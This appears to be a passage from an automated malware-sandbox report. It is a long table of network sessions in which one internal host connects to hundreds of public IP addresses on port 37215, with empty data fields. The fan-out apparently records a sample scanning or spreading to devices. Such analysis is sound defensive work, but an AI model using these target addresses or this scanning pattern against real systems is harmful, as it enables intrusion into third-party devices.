                                              29091192.168.2.1535180181.0.246.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29092192.168.2.1537680102.239.233.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29093192.168.2.1557932190.181.42.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29094192.168.2.1544282186.27.31.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29095192.168.2.1536058190.150.208.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29096192.168.2.1542456156.78.206.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29097192.168.2.154648641.94.220.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29098192.168.2.1558218190.118.7.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29099192.168.2.153451441.80.42.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29100192.168.2.1543364102.136.131.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29101192.168.2.154163894.59.183.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29102192.168.2.153505694.85.236.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29103192.168.2.153961845.152.66.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29104192.168.2.155767241.34.76.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29105192.168.2.1559146102.124.221.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29106192.168.2.154841237.192.75.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29107192.168.2.1556808222.151.139.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29108192.168.2.153499631.172.42.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29109192.168.2.1537530181.114.255.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29110192.168.2.1553654156.86.228.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29111192.168.2.155835694.19.181.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29112192.168.2.153842637.113.197.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29113192.168.2.1545546138.31.180.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29114192.168.2.155289241.221.153.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29115192.168.2.1540904190.229.208.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29116192.168.2.1557430190.1.48.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29117192.168.2.1546880122.200.85.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29118192.168.2.155203441.38.144.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29119192.168.2.1538092121.1.60.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29120192.168.2.1548188122.210.8.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29121192.168.2.1558052222.49.49.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29122192.168.2.1537938197.249.192.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29123192.168.2.1550910156.37.63.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29124192.168.2.155775294.86.157.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29125192.168.2.154896837.26.253.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29126192.168.2.153948837.135.178.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29127192.168.2.1554878102.250.151.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29128192.168.2.1541224181.10.238.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29129192.168.2.1551670222.101.106.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29130192.168.2.154381845.183.138.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29131192.168.2.1534848190.80.149.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29132192.168.2.1540658157.73.74.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29133192.168.2.1549724192.57.187.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29134192.168.2.1556856156.41.147.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29135192.168.2.155282620.0.40.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29136192.168.2.1541780102.34.230.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29137192.168.2.154099631.72.141.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29138192.168.2.155211441.200.28.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29139192.168.2.1560978102.221.147.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29140192.168.2.1560380102.144.6.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29141192.168.2.1533250121.180.71.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29142192.168.2.1559590222.72.45.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29143192.168.2.154111294.5.32.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29144192.168.2.1558680186.141.36.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29145192.168.2.1548898102.17.176.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29146192.168.2.153750437.237.162.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29147192.168.2.1545974157.43.8.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29148192.168.2.1544700121.217.40.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29149192.168.2.154746437.181.212.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29150192.168.2.154944431.56.156.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29151192.168.2.1554730156.15.1.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29152192.168.2.154465831.6.198.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29153192.168.2.1537744138.115.156.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29154192.168.2.1544948156.75.17.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29155192.168.2.1540528138.183.197.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29156192.168.2.1549596157.71.237.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29157192.168.2.1543630122.50.129.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29158192.168.2.1553994102.31.217.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29159192.168.2.1535480181.217.194.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29160192.168.2.1546410121.181.241.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29161192.168.2.1546038156.226.175.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29162192.168.2.153922037.48.165.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29163192.168.2.155231294.64.192.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29164192.168.2.1541856197.68.27.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29165192.168.2.153329231.231.15.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29166192.168.2.1540228181.19.213.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29167192.168.2.1537766121.143.178.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29168192.168.2.155773645.227.159.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29169192.168.2.1535832156.159.185.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29170192.168.2.1534288121.35.86.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29171192.168.2.155606294.212.44.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29172192.168.2.1546830197.106.112.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29173192.168.2.155351631.158.97.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29174192.168.2.155458637.49.16.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29175192.168.2.154477231.226.93.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29176192.168.2.1554794102.196.125.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29177192.168.2.1544518197.112.9.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29178192.168.2.1547616190.83.85.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29179192.168.2.1555390190.59.225.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29180192.168.2.1555848138.226.203.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29181192.168.2.154881841.211.124.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29182192.168.2.1547610102.253.155.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29183192.168.2.1552888138.184.151.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29184192.168.2.1558176222.86.39.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29185192.168.2.1557744182.132.60.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29186192.168.2.155918431.233.71.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29187192.168.2.1539660156.133.3.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29188192.168.2.1540174186.144.121.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29189192.168.2.1539948181.173.40.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29190192.168.2.1536402222.47.78.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29191192.168.2.155985294.53.128.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29192192.168.2.154401437.165.174.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29193192.168.2.1551002138.208.154.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29194192.168.2.155034258.147.118.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29195192.168.2.1534002197.244.200.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29196192.168.2.1540104138.242.46.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29197192.168.2.1559162102.255.25.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29198192.168.2.155299037.104.12.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29199192.168.2.1539344156.28.230.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29200192.168.2.1539014138.185.136.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29201192.168.2.1541658156.84.122.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29202192.168.2.155503431.198.115.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29203192.168.2.153377037.191.24.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29204192.168.2.1550276186.62.252.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29205192.168.2.1542380197.170.79.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29206192.168.2.1545640102.254.0.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29207192.168.2.1559262122.194.30.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29208192.168.2.1554660121.97.54.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29209192.168.2.155121031.108.48.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29210192.168.2.155810494.155.228.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29211192.168.2.1538764122.7.202.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29212192.168.2.1550004181.96.191.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29213192.168.2.1554134181.160.157.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29214192.168.2.153775094.119.127.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29215192.168.2.155091831.196.148.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29216192.168.2.1537318197.156.129.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29217192.168.2.153717037.12.111.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29218192.168.2.1534552222.111.167.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29219192.168.2.154322037.42.115.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29220192.168.2.1544510157.86.194.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29221192.168.2.1553504156.97.97.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29222192.168.2.1545502122.83.147.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29223192.168.2.1535392122.237.94.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29224192.168.2.154940694.118.89.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29225192.168.2.155172237.106.37.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29226192.168.2.155873273.11.154.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29227192.168.2.1534018190.119.202.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29228192.168.2.1560092128.45.81.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29229192.168.2.1538506138.96.94.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29230192.168.2.1560208138.30.210.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29231192.168.2.1548548186.151.160.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29232192.168.2.1558754190.83.36.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29233192.168.2.1557448156.123.78.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29234192.168.2.1533238121.255.250.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29235192.168.2.1550758122.150.119.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29236192.168.2.155190241.180.48.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29237192.168.2.155138245.126.95.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29238192.168.2.1546656197.95.171.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29239192.168.2.154018694.162.65.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29240192.168.2.1552626122.73.15.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29241192.168.2.1547046102.17.116.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29242192.168.2.154023245.55.123.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29243192.168.2.1534400181.231.13.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29244192.168.2.1555156121.135.214.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29245192.168.2.1549756186.171.190.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29246192.168.2.155506641.231.185.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29247192.168.2.155239437.212.143.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29248192.168.2.1548138190.226.92.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29249192.168.2.154049045.160.58.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29250192.168.2.1558284197.103.20.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29251192.168.2.1535316102.182.252.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29252192.168.2.1544362102.12.104.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29253192.168.2.1545926157.64.3.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29254192.168.2.154128094.12.150.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29255192.168.2.155469045.152.112.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29256192.168.2.1547204121.141.227.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29257192.168.2.1549412222.164.249.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29258192.168.2.1534438138.186.201.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29259192.168.2.1551420157.9.39.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29260192.168.2.155315894.78.105.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29261192.168.2.1547516122.63.142.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29262192.168.2.1545516156.106.252.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29263192.168.2.1560608186.23.6.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29264192.168.2.153478041.174.2.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29265192.168.2.153893041.200.39.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29266192.168.2.1552318157.215.170.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29267192.168.2.1536888157.120.185.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29268192.168.2.153725637.37.253.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29269192.168.2.1536254122.156.171.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29270192.168.2.1555244102.233.194.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29271192.168.2.1544938190.72.21.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29272192.168.2.1546890138.170.180.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29273192.168.2.1537760156.71.241.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29274192.168.2.1551156157.152.83.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29275192.168.2.1552952156.163.143.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29276192.168.2.156023899.175.145.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29277192.168.2.1560638190.4.185.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29278192.168.2.1540518190.123.179.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29279192.168.2.1550282181.168.139.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29280192.168.2.1539284190.224.156.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29281192.168.2.155037694.238.20.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29282192.168.2.1560082121.219.103.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29283192.168.2.153564041.71.168.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29284192.168.2.1560086190.239.229.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29285192.168.2.154444894.251.111.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29286192.168.2.1560446186.21.74.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29287192.168.2.1559974122.209.102.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29288192.168.2.1538968181.31.141.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29289192.168.2.1557240222.146.247.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29290192.168.2.1555656190.210.67.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29291192.168.2.1558510102.139.126.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29292192.168.2.155298441.186.76.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29293192.168.2.156037431.163.175.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29294192.168.2.1533566186.9.108.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29295192.168.2.1554330122.159.178.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29296192.168.2.1550194190.177.64.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29297192.168.2.1542928156.88.88.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29298192.168.2.1548114182.101.135.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29299192.168.2.153833431.107.107.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29300192.168.2.1544592157.246.46.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29301192.168.2.1554856157.136.241.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29302192.168.2.1554644122.53.140.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29303192.168.2.1550422102.59.189.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29304192.168.2.1544094138.34.221.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29305192.168.2.1553318122.175.249.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29306192.168.2.154240641.95.113.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29307192.168.2.1534226110.133.79.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29308192.168.2.154891831.253.48.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29309192.168.2.155776441.194.224.23837215
